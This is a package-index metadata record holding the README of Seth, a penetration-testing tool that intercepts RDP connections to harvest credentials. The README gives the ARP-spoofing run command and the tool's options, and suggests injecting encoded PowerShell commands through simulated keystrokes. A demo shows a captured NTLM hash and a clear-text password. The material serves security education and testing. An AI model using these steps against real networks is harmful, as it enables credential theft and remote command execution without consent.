{"id":13585665,"url":"https://github.com/SySS-Research/Seth","last_synced_at":"2025-04-07T10:31:23.771Z","repository":{"id":46126820,"uuid":"84575372","full_name":"SySS-Research/Seth","owner":"SySS-Research","description":"Perform a MitM attack and extract clear text credentials from RDP connections","archived":false,"fork":false,"pushed_at":"2023-02-09T14:29:05.000Z","size":2023,"stargazers_count":1418,"open_issues_count":15,"forks_count":322,"subscribers_count":89,"default_branch":"master","last_synced_at":"2025-04-01T09:34:27.896Z","etag":null,"topics":["arp-spoofing","mitm","proof-of-concept","rdp","security"],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/SySS-Research.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null}},"created_at":"2017-03-10T15:46:38.000Z","updated_at":"2025-03-28T08:16:42.000Z","dependencies_parsed_at":"2024-01-07T22:50:10.092Z","dependency_job_id":"239c149d-a1b8-4188-8d69-6c3fcf0d1b5c","html_url":"https://github.com/SySS-Research/Seth","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/SySS-Research%2FSeth","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/SySS-Research%2FSeth/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/SySS-Research%2FSeth/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/SySS-Research%2FSeth/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/SySS-R
esearch","download_url":"https://codeload.github.com/SySS-Research/Seth/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":247636312,"owners_count":20970901,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["arp-spoofing","mitm","proof-of-concept","rdp","security"],"created_at":"2024-08-01T15:05:04.221Z","updated_at":"2025-04-07T10:31:23.090Z","avatar_url":"https://github.com/SySS-Research.png","language":"Python","funding_links":[],"categories":["Python"],"sub_categories":[],"readme":"Seth\n====\n\nSeth is a tool written in Python and Bash to MitM RDP connections by\nattempting to downgrade the connection in order to extract clear text\ncredentials. It was developed to raise awareness and educate about the\nimportance of properly configured RDP connections in the context of\npentests, workshops or talks. The author is Adrian Vollmer (SySS GmbH).\n\nUsage\n-----\n\nRun it like this:\n\n    $ ./seth.sh \u003cINTERFACE\u003e \u003cATTACKER IP\u003e \u003cVICTIM IP\u003e \u003cGATEWAY IP|HOST IP\u003e [\u003cCOMMAND\u003e]\n\nUnless the RDP host is on the same subnet as the victim machine, the last IP\naddress must be that of the gateway.\n\nThe last parameter is optional. It can contain a command that is executed on\nthe RDP host by simulating WIN+R via key press event injection. Keystroke\ninjection depends on which keyboard layout the victim is using - currently\nit's only reliable with the English US layout. 
I suggest avoiding special\ncharacters by using `powershell -enc \u003cSTRING\u003e`, where STRING is your\nUTF-16LE and Base64 encoded command. However, `calc` should be pretty\nuniversal and gets the job done.\n\nThe shell script performs ARP spoofing to gain a Man-in-the-Middle position\nand redirects the traffic such that it runs through an RDP proxy. The proxy\ncan be called separately. This can be useful if you want to use Seth in\ncombination with Responder. Use Responder to gain a Man-in-the-Middle\nposition and run Seth at the same time. Run `seth.py -h` for more\ninformation:\n\n    usage: seth.py [-h] [-d] [-f] [-p LISTEN_PORT] [-b BIND_IP] [-g {0,1,3,11}]\n                   [-j INJECT] -c CERTFILE -k KEYFILE\n                   target_host [target_port]\n\n    RDP credential sniffer -- Adrian Vollmer, SySS GmbH 2017\n\n    positional arguments:\n      target_host           target host of the RDP service\n      target_port           TCP port of the target RDP service (default 3389)\n\n    optional arguments:\n      -h, --help            show this help message and exit\n      -d, --debug           show debug information\n      -f, --fake-server     perform a 'fake server' attack\n      -p LISTEN_PORT, --listen-port LISTEN_PORT\n                            TCP port to listen on (default 3389)\n      -b BIND_IP, --bind-ip BIND_IP\n                            IP address to bind the fake service to (default all)\n      -g {0,1,3,11}, --downgrade {0,1,3,11}\n                            downgrade the authentication protocol to this (default\n                            3)\n      -j INJECT, --inject INJECT\n                            command to execute via key press event injection\n      -c CERTFILE, --certfile CERTFILE\n                            path to the certificate file\n      -k KEYFILE, --keyfile KEYFILE\n                            path to the key file\n\nFor more information read the PDF in `doc/paper` (or read the code!). 
The\npaper also contains recommendations for countermeasures.\n\nYou can also watch a twenty-minute presentation including a demo (starting\nat 14:00) on YouTube: https://www.youtube.com/watch?v=wdPkY7gykf4\n\nOr watch just the demo (with subtitles) here:\nhttps://www.youtube.com/watch?v=JvvxTNrKV-s\n\nDemo\n----\n\nThe following output shows the attacker's view. Seth sniffs an offline\ncrackable hash as well as the clear text password. Here, NLA is not enforced\nand the victim ignored the certificate warning.\n\n![Seth](https://github.com/SySS-Research/Seth/blob/master/doc/img/seth-logo.png)\n\n    # ./seth.sh eth1 192.168.57.{103,2,102}\n    ███████╗███████╗████████╗██╗  ██╗\n    ██╔════╝██╔════╝╚══██╔══╝██║  ██║   by Adrian Vollmer\n    ███████╗█████╗     ██║   ███████║   seth@vollmer.syss.de\n    ╚════██║██╔══╝     ██║   ██╔══██║   SySS GmbH, 2017\n    ███████║███████╗   ██║   ██║  ██║   https://www.syss.de\n    ╚══════╝╚══════╝   ╚═╝   ╚═╝  ╚═╝\n    [*] Spoofing arp replies...\n    [*] Turning on IP forwarding...\n    [*] Set iptables rules for SYN packets...\n    [*] Waiting for a SYN packet to the original destination...\n    [+] Got it! 
Original destination is 192.168.57.102\n    [*] Clone the x509 certificate of the original destination...\n    [*] Adjust the iptables rule for all packets...\n    [*] Run RDP proxy...\n    Listening for new connection\n    Connection received from 192.168.57.103:50431\n    Downgrading authentication options from 11 to 3\n    Enable SSL\n    alice::avollmer-syss:1f20645749b0dfd5:b0d3d5f1642c05764ca28450f89d38db:[...]\n    Tamper with NTLM response\n    TLS alert access denied, Downgrading CredSSP\n    Connection lost\n    Connection received from 192.168.57.103:50409\n    Listening for new connection\n    Enable SSL\n    Connection lost\n    Connection received from 192.168.57.103:50410\n    Listening for new connection\n    Enable SSL\n    Hiding forged protocol request from client\n    .\\alice:ilovebob\n    Keyboard Layout: 0x409 (English_United_States)\n    Key press:   LShift\n    Key press:   S\n    Key release:                 S\n    Key release:                 LShift\n    Key press:   E\n    Key release:                 E\n    Key press:   C\n    Key release:                 C\n    Key press:   R\n    Key release:                 R\n    Key press:   E\n    Key release:                 E\n    Key press:   T\n    Key release:                 T\n    Connection lost\n    [*] Cleaning up...\n    [*] Done.\n\nRequirements\n------------\n\n* `python3`\n* `tcpdump`\n* `arpspoof`\n\n  `arpspoof` is part of `dsniff`\n* `openssl`\n\n\nDisclaimer\n----------\n\nUse at your own risk. Do not use without full consent of everyone involved.\nFor educational purposes only.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FSySS-Research%2FSeth","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FSySS-Research%2FSeth","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FSySS-Research%2FSeth/lists"}